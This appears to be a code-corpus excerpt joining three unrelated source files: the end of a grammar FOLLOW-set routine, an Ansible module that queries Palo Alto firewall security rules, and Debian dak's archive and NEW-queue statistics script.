        S = FIRST(Yi)
        OUT.update(everything_but_e(S))
        # A symbol that cannot vanish blocks later symbols' contributions.
        if Empty not in S:
            break
    # if we got to the end of the loop without breaking, add Empty
    else:
        OUT.add(Empty)
    return OUT
#noinspection PyPep8Naming
def compute_follows():
    """Populate FOLLOW for all nonterminals by fixed-point iteration
    (the dragon-book FOLLOW algorithm; requires FIRST to be computed)."""
    from Skoarcery.terminals import EOF, Empty
    from Skoarcery.nonterminals import nonterminals as N, SKOAR
    global FIRST, FOLLOW
    # start symbol gets end symbol
    FOLLOW(SKOAR).add(EOF)
    # repeat until nothing can be added to any follow set
    last = 0
    follow_len = len(FOLLOW)
    while follow_len > last:
        last = follow_len
        for X in N.values():
            for R in X.production_rules:
                A = R.production
                # If there is a production [ A -> alpha B beta]:
                #     everything except <e> in FIRST(beta) is in FOLLOW(B)
                # examine each suffix (except last)
                n = len(A)
                for i in range(0, n - 1):
                    B = A[i]
                    if not isinstance(B, Nonterminal):
                        continue
                    beta = A[i + 1:]
                    #print("n: " + str(n) + " i: " + str(i) + " A: " + repr(A) + " beta: " + repr(beta))
                    S = FIRST(beta)
                    FOLLOW(B).update(everything_but_e(S))
                # Second rule: FOLLOW(X) flows into FOLLOW(B) for every B
                # whose trailing context beta can derive Empty (walk from
                # the end and stop at the first non-nullable suffix).
                for i in reversed(range(0, n)):
                    B = A[i]
                    if not isinstance(B, Nonterminal):
                        continue
                    # we are at the end of the list
                    if i == n - 1:
                        FOLLOW(B).update(FOLLOW(X))
                        continue
                    beta = A[i + 1:]
                    S = FIRST(beta)
                    #print(": FIRST(" + repr(beta) + ") = " + repr(S))
                    if Empty in S:
                        FOLLOW(B).update(FOLLOW(X))
                    else:
                        break
        follow_len = len(FOLLOW)
| artistic-2.0 |
hryamzik/ansible | lib/ansible/modules/network/panos/panos_query_rules.py | 16 | 18383 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Ansible module to manage PaloAltoNetworks Firewall
# (c) 2016, techbizdev <techbizdev@paloaltonetworks.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# limitations under the License.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: panos_query_rules
short_description: PANOS module that allows search for security rules in PANW NGFW devices.
description: >
- Security policies allow you to enforce rules and take action, and can be as general or specific as needed. The
policy rules are compared against the incoming traffic in sequence, and because the first rule that matches the
traffic is applied, the more specific rules must precede the more general ones.
author: "Bob Hagen (@rnh556)"
version_added: "2.5"
requirements:
- pan-python can be obtained from PyPi U(https://pypi.org/project/pan-python/)
- pandevice can be obtained from PyPi U(https://pypi.org/project/pandevice/)
- xmltodict can be obtains from PyPi U(https://pypi.org/project/xmltodict/)
notes:
- Checkmode is not supported.
- Panorama is supported.
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS firewall or Panorama management console being queried.
required: true
username:
description:
- Username credentials to use for authentication.
default: "admin"
password:
description:
- Password credentials to use for authentication.
required: true
api_key:
description:
- API key that can be used instead of I(username)/I(password) credentials.
application:
description:
- Name of the application or application group to be queried.
source_zone:
description:
- Name of the source security zone to be queried.
source_ip:
description:
- The source IP address to be queried.
source_port:
description:
- The source port to be queried.
destination_zone:
description:
- Name of the destination security zone to be queried.
destination_ip:
description:
- The destination IP address to be queried.
destination_port:
description:
- The destination port to be queried.
protocol:
description:
- The protocol used to be queried. Must be either I(tcp) or I(udp).
tag_name:
description:
- Name of the rule tag to be queried.
devicegroup:
description:
- The Panorama device group in which to conduct the query.
'''
EXAMPLES = '''
- name: search for rules with tcp/3306
panos_query_rules:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
source_zone: 'DevNet'
destination_zone: 'DevVPC'
destination_port: '3306'
protocol: 'tcp'
- name: search devicegroup for inbound rules to dmz host
panos_query_rules:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
destination_zone: 'DMZ'
destination_ip: '10.100.42.18'
address: 'DeviceGroupA'
- name: search for rules containing a specified rule tag
panos_query_rules:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
tag_name: 'ProjectX'
'''
RETURN = '''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
try:
import pan.xapi
from pan.xapi import PanXapiError
import pandevice
from pandevice import base
from pandevice import firewall
from pandevice import panorama
from pandevice import objects
from pandevice import policies
import ipaddress
import xmltodict
import json
HAS_LIB = True
except ImportError:
HAS_LIB = False
def get_devicegroup(device, devicegroup):
    """Return the Panorama DeviceGroup named *devicegroup*, or False if absent."""
    dg_list = device.refresh_devices()
    for group in dg_list:
        if isinstance(group, pandevice.panorama.DeviceGroup):
            if group.name == devicegroup:
                return group
    return False
def get_rulebase(device, devicegroup):
    """Return the refreshed security rulebase for a Firewall, or the
    pre-rulebase of *devicegroup* on Panorama; False for other device types."""
    # Build the rulebase
    if isinstance(device, firewall.Firewall):
        rulebase = policies.Rulebase()
        device.add(rulebase)
    elif isinstance(device, panorama.Panorama):
        dg = panorama.DeviceGroup(devicegroup)
        device.add(dg)
        rulebase = policies.PreRulebase()
        dg.add(rulebase)
    else:
        return False
    # Pull the current rules from the device into the rulebase tree.
    policies.SecurityRule.refreshall(rulebase)
    return rulebase
def get_object(device, dev_group, obj_name):
    """Look up *obj_name* as an AddressObject or AddressGroup, first in the
    device's global objects, then (on Panorama) in *dev_group*.

    Returns the matching object, or False if nothing is found.
    """
    # Search global address objects
    match = device.find(obj_name, objects.AddressObject)
    if match:
        return match
    # Search global address groups
    match = device.find(obj_name, objects.AddressGroup)
    if match:
        return match
    # Search Panorama device group
    if isinstance(device, pandevice.panorama.Panorama):
        # Search device group address objects
        match = dev_group.find(obj_name, objects.AddressObject)
        if match:
            return match
        # Search device group address groups
        match = dev_group.find(obj_name, objects.AddressGroup)
        if match:
            return match
    return False
def addr_in_obj(addr, obj):
    """Return True if IP address *addr* is covered by address object *obj*.

    Supports 'ip-netmask' and 'ip-range' AddressObject types; other types
    (and non-AddressObject inputs) return False.
    """
    ip = ipaddress.ip_address(addr)
    # Process address objects
    if isinstance(obj, objects.AddressObject):
        if obj.type == 'ip-netmask':
            net = ipaddress.ip_network(obj.value)
            if ip in net:
                return True
        if obj.type == 'ip-range':
            ip_range = obj.value.split('-')
            lower = ipaddress.ip_address(ip_range[0])
            upper = ipaddress.ip_address(ip_range[1])
            # BUG FIX: a PAN-OS ip-range is inclusive of its endpoints; the
            # previous strict comparison (lower < ip < upper) wrongly
            # rejected the first and last addresses of the range.
            if lower <= ip <= upper:
                return True
    return False
def get_services(device, dev_group, svc_list, obj_list):
    """Resolve service names in *svc_list* to ServiceObject instances.

    Matches are appended to *obj_list* (which is also returned); service
    groups are expanded recursively. Searches global objects first, then
    (on Panorama) the given device group.
    """
    for svc in svc_list:
        # Search global address objects
        global_obj_match = device.find(svc, objects.ServiceObject)
        if global_obj_match:
            obj_list.append(global_obj_match)
        # Search global address groups
        global_grp_match = device.find(svc, objects.ServiceGroup)
        if global_grp_match:
            # A group's value is a list of member names; recurse to expand.
            get_services(device, dev_group, global_grp_match.value, obj_list)
        # Search Panorama device group
        if isinstance(device, pandevice.panorama.Panorama):
            # Search device group address objects
            dg_obj_match = dev_group.find(svc, objects.ServiceObject)
            if dg_obj_match:
                obj_list.append(dg_obj_match)
            # Search device group address groups
            dg_grp_match = dev_group.find(svc, objects.ServiceGroup)
            if dg_grp_match:
                get_services(device, dev_group, dg_grp_match.value, obj_list)
    return obj_list
def port_in_svc(orientation, port, protocol, obj):
    """Return True if *port*/*protocol* matches service object *obj*.

    orientation -- 'source' or 'destination': selects which port spec of the
                   service object to test (anything else matches nothing).
    port        -- port to test, as a string.
    protocol    -- 'tcp' or 'udp'; must equal obj.protocol to match.
    obj         -- service object exposing source_port/destination_port
                   (comma-separated ports and "low-high" ranges) and protocol.
    """
    # BUG FIX: the original compared strings with `is`, which tests object
    # identity and only worked through CPython's interning of short string
    # literals; `==` is the correct comparison. The duplicated source/
    # destination branches are also unified here.
    if orientation == 'source':
        port_spec = obj.source_port
    elif orientation == 'destination':
        port_spec = obj.destination_port
    else:
        return False
    for x in port_spec.split(','):
        if '-' in x:
            # Range entry, e.g. "1000-2000" (inclusive).
            port_range = x.split('-')
            lower = int(port_range[0])
            upper = int(port_range[1])
            if (lower <= int(port) <= upper) and (obj.protocol == protocol):
                return True
        else:
            # Single-port entry must match exactly.
            if port == x and obj.protocol == protocol:
                return True
    return False
def get_tag(device, dev_group, tag_name):
    """Return the Tag object named *tag_name* from the global objects or
    (on Panorama) from *dev_group*; False if not found."""
    # Search global address objects
    match = device.find(tag_name, objects.Tag)
    if match:
        return match
    # Search Panorama device group
    if isinstance(device, panorama.Panorama):
        # Search device group address objects
        match = dev_group.find(tag_name, objects.Tag)
        if match:
            return match
    return False
def main():
    """Ansible module entry point: query security rules matching the given
    criteria and report them (or fail if none match)."""
    # --- module argument handling ------------------------------------------
    argument_spec = dict(
        ip_address=dict(required=True),
        password=dict(no_log=True),
        username=dict(default='admin'),
        api_key=dict(no_log=True),
        application=dict(default=None),
        source_zone=dict(default=None),
        destination_zone=dict(default=None),
        source_ip=dict(default=None),
        destination_ip=dict(default=None),
        source_port=dict(default=None),
        destination_port=dict(default=None),
        protocol=dict(default=None, choices=['tcp', 'udp']),
        tag_name=dict(default=None),
        devicegroup=dict(default=None)
    )
    module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False,
                           required_one_of=[['api_key', 'password']]
                           )
    if not HAS_LIB:
        module.fail_json(msg='Missing required libraries.')
    ip_address = module.params["ip_address"]
    password = module.params["password"]
    username = module.params['username']
    api_key = module.params['api_key']
    # NOTE(review): `application` is parsed but never used in the matching
    # logic below — application filtering appears to be unimplemented.
    application = module.params['application']
    source_zone = module.params['source_zone']
    source_ip = module.params['source_ip']
    source_port = module.params['source_port']
    destination_zone = module.params['destination_zone']
    destination_ip = module.params['destination_ip']
    destination_port = module.params['destination_port']
    protocol = module.params['protocol']
    tag_name = module.params['tag_name']
    devicegroup = module.params['devicegroup']
    # Create the device with the appropriate pandevice type
    device = base.PanDevice.create_from_device(ip_address, username, password, api_key=api_key)
    # Grab the global objects
    objects.AddressObject.refreshall(device)
    objects.AddressGroup.refreshall(device)
    objects.ServiceObject.refreshall(device)
    objects.ServiceGroup.refreshall(device)
    objects.Tag.refreshall(device)
    # If Panorama, validate the devicegroup and grab the devicegroup objects
    dev_group = None
    if devicegroup and isinstance(device, panorama.Panorama):
        dev_group = get_devicegroup(device, devicegroup)
        if dev_group:
            device.add(dev_group)
            objects.AddressObject.refreshall(dev_group)
            objects.AddressGroup.refreshall(dev_group)
            objects.ServiceObject.refreshall(dev_group)
            objects.ServiceGroup.refreshall(dev_group)
            objects.Tag.refreshall(dev_group)
        else:
            module.fail_json(
                failed=1,
                msg='\'%s\' device group not found in Panorama. Is the name correct?' % devicegroup
            )
    # Build the rulebase and produce list
    rulebase = get_rulebase(device, dev_group)
    rulelist = rulebase.children
    hitbase = policies.Rulebase()
    # With loose matching, a rule field of 'any' matches every query value.
    loose_match = True
    # --- evaluate each rule against every requested criterion --------------
    # hitlist collects one boolean per criterion; a rule is a hit only if
    # every requested criterion matched (no False in hitlist).
    for rule in rulelist:
        hitlist = []
        if source_zone:
            source_zone_match = False
            if loose_match and 'any' in rule.fromzone:
                source_zone_match = True
            else:
                for object_string in rule.fromzone:
                    if object_string == source_zone:
                        source_zone_match = True
            hitlist.append(source_zone_match)
        if destination_zone:
            destination_zone_match = False
            if loose_match and 'any' in rule.tozone:
                destination_zone_match = True
            else:
                for object_string in rule.tozone:
                    if object_string == destination_zone:
                        destination_zone_match = True
            hitlist.append(destination_zone_match)
        if source_ip:
            source_ip_match = False
            if loose_match and 'any' in rule.source:
                source_ip_match = True
            else:
                for object_string in rule.source:
                    # Get a valid AddressObject or AddressGroup
                    obj = get_object(device, dev_group, object_string)
                    # Otherwise the object_string is not an object and should be handled differently
                    if obj is False:
                        # Literal value in the rule: either "low-high" range
                        # or an exact address string.
                        if '-' in object_string:
                            obj = ipaddress.ip_address(source_ip)
                            source_range = object_string.split('-')
                            source_lower = ipaddress.ip_address(source_range[0])
                            source_upper = ipaddress.ip_address(source_range[1])
                            if source_lower <= obj <= source_upper:
                                source_ip_match = True
                        else:
                            if source_ip == object_string:
                                source_ip_match = True
                    if isinstance(obj, objects.AddressObject) and addr_in_obj(source_ip, obj):
                        source_ip_match = True
                    elif isinstance(obj, objects.AddressGroup) and obj.static_value:
                        # Static group: test each member object.
                        for member_string in obj.static_value:
                            member = get_object(device, dev_group, member_string)
                            if addr_in_obj(source_ip, member):
                                source_ip_match = True
            hitlist.append(source_ip_match)
        if destination_ip:
            destination_ip_match = False
            if loose_match and 'any' in rule.destination:
                destination_ip_match = True
            else:
                for object_string in rule.destination:
                    # Get a valid AddressObject or AddressGroup
                    obj = get_object(device, dev_group, object_string)
                    # Otherwise the object_string is not an object and should be handled differently
                    if obj is False:
                        if '-' in object_string:
                            obj = ipaddress.ip_address(destination_ip)
                            destination_range = object_string.split('-')
                            destination_lower = ipaddress.ip_address(destination_range[0])
                            destination_upper = ipaddress.ip_address(destination_range[1])
                            if destination_lower <= obj <= destination_upper:
                                destination_ip_match = True
                        else:
                            if destination_ip == object_string:
                                destination_ip_match = True
                    if isinstance(obj, objects.AddressObject) and addr_in_obj(destination_ip, obj):
                        destination_ip_match = True
                    elif isinstance(obj, objects.AddressGroup) and obj.static_value:
                        for member_string in obj.static_value:
                            member = get_object(device, dev_group, member_string)
                            if addr_in_obj(destination_ip, member):
                                destination_ip_match = True
            hitlist.append(destination_ip_match)
        if source_port:
            source_port_match = False
            orientation = 'source'
            if loose_match and (rule.service[0] == 'any'):
                source_port_match = True
            elif rule.service[0] == 'application-default':
                source_port_match = False  # Fix this once apps are supported
            else:
                service_list = []
                service_list = get_services(device, dev_group, rule.service, service_list)
                for obj in service_list:
                    if port_in_svc(orientation, source_port, protocol, obj):
                        source_port_match = True
                        break
            hitlist.append(source_port_match)
        if destination_port:
            destination_port_match = False
            orientation = 'destination'
            if loose_match and (rule.service[0] == 'any'):
                destination_port_match = True
            elif rule.service[0] == 'application-default':
                destination_port_match = False  # Fix this once apps are supported
            else:
                service_list = []
                service_list = get_services(device, dev_group, rule.service, service_list)
                for obj in service_list:
                    if port_in_svc(orientation, destination_port, protocol, obj):
                        destination_port_match = True
                        break
            hitlist.append(destination_port_match)
        if tag_name:
            tag_match = False
            if rule.tag:
                for object_string in rule.tag:
                    obj = get_tag(device, dev_group, object_string)
                    if obj and (obj.name == tag_name):
                        tag_match = True
            hitlist.append(tag_match)
        # Add to hit rulebase
        if False not in hitlist:
            hitbase.add(rule)
    # Dump the hit rulebase
    if hitbase.children:
        # Render the matched rules as XML converted to JSON for readability.
        output_string = xmltodict.parse(hitbase.element_str())
        module.exit_json(
            stdout_lines=json.dumps(output_string, indent=2),
            msg='%s of %s rules matched' % (hitbase.children.__len__(), rulebase.children.__len__())
        )
    else:
        module.fail_json(msg='No matching rules found.')


if __name__ == '__main__':
    main()
| gpl-3.0 |
ximion/dak-dep11 | dak/stats.py | 6 | 15923 | #!/usr/bin/env python
""" Various statistical pr0nography fun and games """
# Copyright (C) 2000, 2001, 2002, 2003, 2006 James Troup <james@nocrew.org>
# Copyright (C) 2013 Luca Falavigna <dktrkranz@debian.org>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
################################################################################
# <aj> can we change the standards instead?
# <neuro> standards?
# <aj> whatever we're not conforming to
# <aj> if there's no written standard, why don't we declare linux as
# the defacto standard
# <aj> go us!
# [aj's attempt to avoid ABI changes for released architecture(s)]
################################################################################
import sys
import apt_pkg
from datetime import datetime
from email.utils import mktime_tz, parsedate_tz
from mailbox import mbox
from os import listdir, system, unlink
from os.path import isfile, join, splitext
from re import findall, DOTALL, MULTILINE
from sys import stderr
from yaml import safe_load, safe_dump
from daklib import utils
from daklib.dbconn import DBConn, get_suite_architectures, Suite, Architecture
################################################################################
Cnf = None            # dak configuration mapping, initialised in main()
stats = {}            # accumulated NEW-queue statistics, loaded from/saved to YAML
users = {}            # LDAP mapping: real name -> team member account (new_stats mode)
buffer = 0            # NOTE(review): appears unused in this module; also shadows the builtin
FORMAT_SWITCH = '2009-08'        # month ('YYYY-MM') where the log format changed
blacklisted = ('dak', 'katie')   # automated actors excluded from the statistics
# Log-line regexes; pre- and post-FORMAT_SWITCH logs use different grammars.
NEW = ('^(\d{14})\|(?:jennifer|process-unchecked|.*?\|dak)'
       '\|(Moving to new|ACCEPT-TO-NEW)')
new_ACTIONS = '^(\d{14})\|[^\|]*\|(\S+)\|NEW (\S+)[:\|]'
old_ACTIONS = ('(?:lisa|process-new)\|program start\|(.*?)\|'
               '(?:lisa|process-new)\|program end')
old_ACTION = '^(\d{14})\|(?:lisa|process-new)\|(Accepting changes|rejected)\|'
################################################################################
def usage(exit_code=0):
    """Print the command usage summary and terminate the process.

    :param exit_code: exit status to terminate with; 0 for a plain
        ``--help`` request, non-zero after a usage error.
    """
    # Single-argument parenthesised print is identical under Python 2
    # (prints the one string) and Python 3 (print function), unlike the
    # bare py2-only ``print <expr>`` statement this replaces.
    print("""Usage: dak stats MODE
Print various stats.
  -h, --help                show this help and exit.
The following MODEs are available:
  arch-space    - displays space used by each architecture
  pkg-nums      - displays the number of packages by suite/architecture
  daily-install - displays daily install stats suitable for graphing
  new           - stores stats about the NEW queue
""")
    sys.exit(exit_code)
################################################################################
def per_arch_space_use():
    # Report the archive disk space consumed per binary architecture,
    # followed by the combined size of all source artefacts.
    session = DBConn().session()
    # Join binaries to their files so each file's size is attributed to
    # the architecture of the binary built from it.
    q = session.execute("""
SELECT a.arch_string as Architecture, sum(f.size) AS sum
  FROM files f, binaries b, architecture a
  WHERE a.id=b.architecture AND f.id=b.file
  GROUP BY a.arch_string ORDER BY sum""").fetchall()
    for j in q:
        print "%-15.15s %s" % (j[0], j[1])
    print
    # Source packages have no architecture row; match their typical
    # filename suffixes (.diff.gz / .tar.gz / .dsc) instead.
    q = session.execute("SELECT sum(size) FROM files WHERE filename ~ '.(diff.gz|tar.gz|dsc)$'").fetchall()
    print "%-15.15s %s" % ("Source", q[0][0])
################################################################################
def daily_install_stats():
    # Aggregate per-day installation statistics from an archive log and
    # print "<date> <package count> <size in MiB>" lines for graphing.
    stats = {}
    # NOTE(review): log filename is hard-coded — presumably a sample or
    # work in progress; confirm before relying on this mode.
    f = utils.open_file("2001-11")
    for line in f.readlines():
        split = line.strip().split('|')
        program = split[1]
        # Only the archive-installation tool matters (old and new names).
        if program != "katie" and program != "process-accepted":
            continue
        action = split[2]
        if action != "installing changes" and action != "installed":
            continue
        date = split[0][:8]  # YYYYMMDD prefix of the timestamp field
        if not stats.has_key(date):
            stats[date] = {}
            stats[date]["packages"] = 0
            stats[date]["size"] = 0.0
        # One "installing changes" line per upload; "installed" lines
        # carry a byte count in field 5.
        if action == "installing changes":
            stats[date]["packages"] += 1
        elif action == "installed":
            stats[date]["size"] += float(split[5])
    dates = stats.keys()
    dates.sort()
    for date in dates:
        packages = stats[date]["packages"]
        size = int(stats[date]["size"] / 1024.0 / 1024.0)  # bytes -> MiB
        print "%s %s %s" % (date, packages, size)
################################################################################
def longest(list):
    """Return the length of the longest string in *list*, or 0 if empty.

    The parameter name shadows the builtin; kept for interface
    compatibility with existing callers.
    """
    # max() over the mapped lengths replaces the manual scan; the empty
    # sequence must be guarded because max() raises on it (the original
    # loop returned 0 in that case).
    if not list:
        return 0
    return max(map(len, list))
def output_format(suite):
    """Abbreviate a suite name to the first letter of each dash part.

    e.g. 'proposed-updates' -> 'p-u', 'stable' -> 's'.
    """
    return "-".join(part[0] for part in suite.split("-"))
def number_of_packages():
    # Print a table of package counts per (suite, architecture),
    # including a synthetic "source" architecture column; '-' marks an
    # architecture that is not enabled for a given suite.
    arches = {}      # arch id -> arch string
    arch_ids = {}    # arch string -> arch id
    suites = {}      # suite id -> suite name
    suite_ids = {}   # suite name -> suite id
    d = {}           # d[suite_id][arch_id] -> package count
    session = DBConn().session()
    # Build up suite mapping
    for i in session.query(Suite).all():
        suites[i.suite_id] = i.suite_name
        suite_ids[i.suite_name] = i.suite_id
    # Build up architecture mapping
    for i in session.query(Architecture).all():
        arches[i.arch_id] = i.arch_string
        arch_ids[i.arch_string] = i.arch_id
    # Pre-create the dictionary
    for suite_id in suites.keys():
        d[suite_id] = {}
        for arch_id in arches.keys():
            d[suite_id][arch_id] = 0
    # Get the raw data for binaries
    # Simultate 'GROUP by suite, architecture' with a dictionary
    # XXX: Why don't we just get the DB to do this?
    for i in session.execute("""SELECT suite, architecture, COUNT(suite)
                                FROM bin_associations
                           LEFT JOIN binaries ON bin = binaries.id
                            GROUP BY suite, architecture""").fetchall():
        d[ i[0] ][ i[1] ] = i[2]
    # Get the raw data for source
    arch_id = arch_ids["source"]
    for i in session.execute('SELECT suite, COUNT(suite) FROM src_associations GROUP BY suite').fetchall():
        (suite_id, count) = i
        d[suite_id][arch_id] = d[suite_id][arch_id] + count
    ## Print the results
    # Setup
    suite_list = suites.values()
    suite_id_list = []
    suite_arches = {}   # suite id -> {arch string: ""} (enabled arches)
    for suite in suite_list:
        suite_id = suite_ids[suite]
        suite_arches[suite_id] = {}
        for arch in get_suite_architectures(suite):
            suite_arches[suite_id][arch.arch_string] = ""
        suite_id_list.append(suite_id)
    # Column headers use the abbreviated suite names (see output_format).
    output_list = [ output_format(i) for i in suite_list ]
    longest_suite = longest(output_list)
    arch_list = arches.values()
    arch_list.sort()
    longest_arch = longest(arch_list)
    # Header
    output = (" "*longest_arch) + " |"
    for suite in output_list:
        output = output + suite.center(longest_suite)+" |"
    output = output + "\n"+(len(output)*"-")+"\n"
    # per-arch data
    arch_list = arches.values()
    arch_list.sort()
    longest_arch = longest(arch_list)
    for arch in arch_list:
        arch_id = arch_ids[arch]
        output = output + arch.center(longest_arch)+" |"
        for suite_id in suite_id_list:
            # '-' when the architecture is not part of the suite at all.
            if suite_arches[suite_id].has_key(arch):
                count = "%d" % d[suite_id][arch_id]
            else:
                count = "-"
            output = output + count.rjust(longest_suite)+" |"
        output = output + "\n"
    print output
################################################################################
def parse_new_uploads(data):
    # Count "moved to NEW" events newer than the last recorded run and
    # fold them into the per-month and all-time buckets of the global
    # `stats` dictionary.  Returns the newest timestamp seen.
    global stats
    latest_timestamp = stats['timestamp']
    for entry in findall(NEW, data, MULTILINE):
        timestamp = entry[0]
        # Already accounted for by a previous invocation.
        if stats['timestamp'] >= timestamp:
            continue
        date = parse_timestamp(timestamp)  # 'YYYY-MM' month bucket key
        if date not in stats:
            stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
                           'REJECT': 0, 'PROD': 0}, 'members': {}}
        stats[date]['stats']['NEW'] += 1
        stats['history']['stats']['NEW'] += 1
        # Assumes log entries appear in chronological order, so the last
        # match processed is the newest — TODO confirm.
        latest_timestamp = timestamp
    return latest_timestamp
def parse_actions(data, logdate):
    # Fold ACCEPT/REJECT (and, for the old format, PROD via mail) events
    # from one monthly log into the per-month and all-time buckets of
    # the global `stats`.  Two grammars exist; FORMAT_SWITCH names the
    # cut-over month, and that month is parsed with *both* grammars.
    # Returns the newest timestamp seen.
    global stats
    latest_timestamp = stats['timestamp']
    if logdate <= FORMAT_SWITCH:
        # Old format: per-session batches delimited by program start/end.
        for batch in findall(old_ACTIONS, data, DOTALL):
            # First token of the session text is the acting member.
            who = batch.split()[0]
            if who in blacklisted:
                continue
            for entry in findall(old_ACTION, batch, MULTILINE):
                action = entry[1]
                # Normalise the free-text verbs to canonical keys.
                if action.startswith('Accepting'):
                    action = 'ACCEPT'
                elif action.startswith('rejected'):
                    action = 'REJECT'
                timestamp = entry[0]
                # Already counted by an earlier run.
                if stats['timestamp'] >= timestamp:
                    continue
                date = parse_timestamp(entry[0])
                if date not in stats:
                    stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
                                   'REJECT': 0, 'PROD': 0}, 'members': {}}
                stats[date]['stats'][action] += 1
                stats['history']['stats'][action] += 1
                if who not in stats[date]['members']:
                    stats[date]['members'][who] = {'ACCEPT': 0, 'REJECT': 0,
                                                   'PROD': 0}
                stats[date]['members'][who][action] += 1
                if who not in stats['history']['members']:
                    stats['history']['members'][who] = {'ACCEPT': 0, 'REJECT': 0,
                                                        'PROD': 0}
                stats['history']['members'][who][action] += 1
                latest_timestamp = timestamp
        # Old-format PROD events only exist as mails; scan the archive.
        parse_prod(logdate)
    if logdate >= FORMAT_SWITCH:
        # New format: one self-describing line per NEW-queue action.
        for entry in findall(new_ACTIONS, data, MULTILINE):
            action = entry[2]
            timestamp = entry[0]
            if stats['timestamp'] >= timestamp:
                continue
            date = parse_timestamp(timestamp)
            if date not in stats:
                stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
                               'REJECT': 0, 'PROD': 0}, 'members': {}}
            member = entry[1]
            if member in blacklisted:
                continue
            # NOTE(review): this bucket-creation block duplicates the one
            # a few lines above; harmless but redundant.
            if date not in stats:
                stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
                               'REJECT': 0, 'PROD': 0}, 'members': {}}
            if member not in stats[date]['members']:
                stats[date]['members'][member] = {'ACCEPT': 0, 'REJECT': 0,
                                                  'PROD': 0}
            if member not in stats['history']['members']:
                stats['history']['members'][member] = {'ACCEPT': 0,
                                                       'REJECT': 0, 'PROD': 0}
            stats[date]['stats'][action] += 1
            stats[date]['members'][member][action] += 1
            stats['history']['stats'][action] += 1
            stats['history']['members'][member][action] += 1
            latest_timestamp = timestamp
    return latest_timestamp
def parse_prod(logdate):
    # Count PROD events ("Comments regarding ..." mails sent by members)
    # for the month of `logdate` by scanning the matching xz-compressed
    # mail archive; silently returns when no archive exists.
    global stats
    global users
    # 'YYYY-MM' logdate -> 'YYMM' archive suffix (last two characters of
    # each dash-separated component).
    maildate = ''.join([x[-2:] for x in logdate.split('-')])
    mailarchive = join(utils.get_conf()['Dir::Base'], 'mail/archive',
                       'mail-%s.xz' % maildate)
    if not isfile(mailarchive):
        return
    # Decompress to a temp file: mbox cannot read xz streams directly.
    (fd, tmpfile) = utils.temp_filename(utils.get_conf()['Dir::TempPath'])
    system('xzcat %s > %s' % (mailarchive, tmpfile))
    for message in mbox(tmpfile):
        if (message['subject'] and
                message['subject'].startswith('Comments regarding')):
            # Map the sender's real name (From header minus the trailing
            # address token) to a member account; skip unknown senders.
            try:
                member = users[' '.join(message['From'].split()[:-1])]
            except KeyError:
                continue
            ts = mktime_tz(parsedate_tz(message['date']))
            timestamp = datetime.fromtimestamp(ts).strftime("%Y%m%d%H%M%S")
            date = parse_timestamp(timestamp)
            if date not in stats:
                stats[date] = {'stats': {'NEW': 0, 'ACCEPT': 0,
                               'REJECT': 0, 'PROD': 0}, 'members': {}}
            if member not in stats[date]['members']:
                stats[date]['members'][member] = {'ACCEPT': 0, 'REJECT': 0,
                                                  'PROD': 0}
            if member not in stats['history']['members']:
                stats['history']['members'][member] = {'ACCEPT': 0,
                                                       'REJECT': 0, 'PROD': 0}
            stats[date]['stats']['PROD'] += 1
            stats[date]['members'][member]['PROD'] += 1
            stats['history']['stats']['PROD'] += 1
            stats['history']['members'][member]['PROD'] += 1
    unlink(tmpfile)
def parse_timestamp(timestamp):
    """Reduce a 'YYYYMMDDhhmmss' stamp to its 'YYYY-MM' month key."""
    return '%d-%02d' % (int(timestamp[:4]), int(timestamp[4:6]))
def new_stats(logdir, yaml):
    # Incrementally update the NEW-queue statistics stored in the `yaml`
    # file by scanning any monthly logs in `logdir` that are newer than
    # the previously saved high-water timestamp.
    global Cnf
    global stats
    try:
        with open(yaml, 'r') as fd:
            stats = safe_load(fd)
    except IOError:
        # First run: no stats file yet; fall through to the default.
        pass
    if not stats:
        stats = {'history': {'stats': {'NEW': 0, 'ACCEPT': 0,
                 'REJECT': 0, 'PROD': 0}, 'members': {}},
                 'timestamp': '19700101000000'}
    latest_timestamp = stats['timestamp']
    for fn in sorted(listdir(logdir)):
        if fn == 'current':
            continue
        log = splitext(fn)[0]  # log name without extension, 'YYYY-MM'
        # Skip whole months that were already fully processed.
        if log < parse_timestamp(stats['timestamp']):
            continue
        logfile = join(logdir, fn)
        if isfile(logfile):
            if fn.endswith('.bz2'):
                # This hack is required becaue python2 does not support
                # multi-stream files (http://bugs.python.org/issue1625)
                (fd, tmpfile) = utils.temp_filename(Cnf['Dir::TempPath'])
                system('bzcat %s > %s' % (logfile, tmpfile))
                with open(tmpfile, 'r') as fd:
                    data = fd.read()
                unlink(tmpfile)
            else:
                with open(logfile, 'r') as fd:
                    data = fd.read()
            # Track the newest event timestamp across both parsers.
            ts = parse_new_uploads(data)
            if ts > latest_timestamp:
                latest_timestamp = ts
            ts = parse_actions(data, log)
            if ts > latest_timestamp:
                latest_timestamp = ts
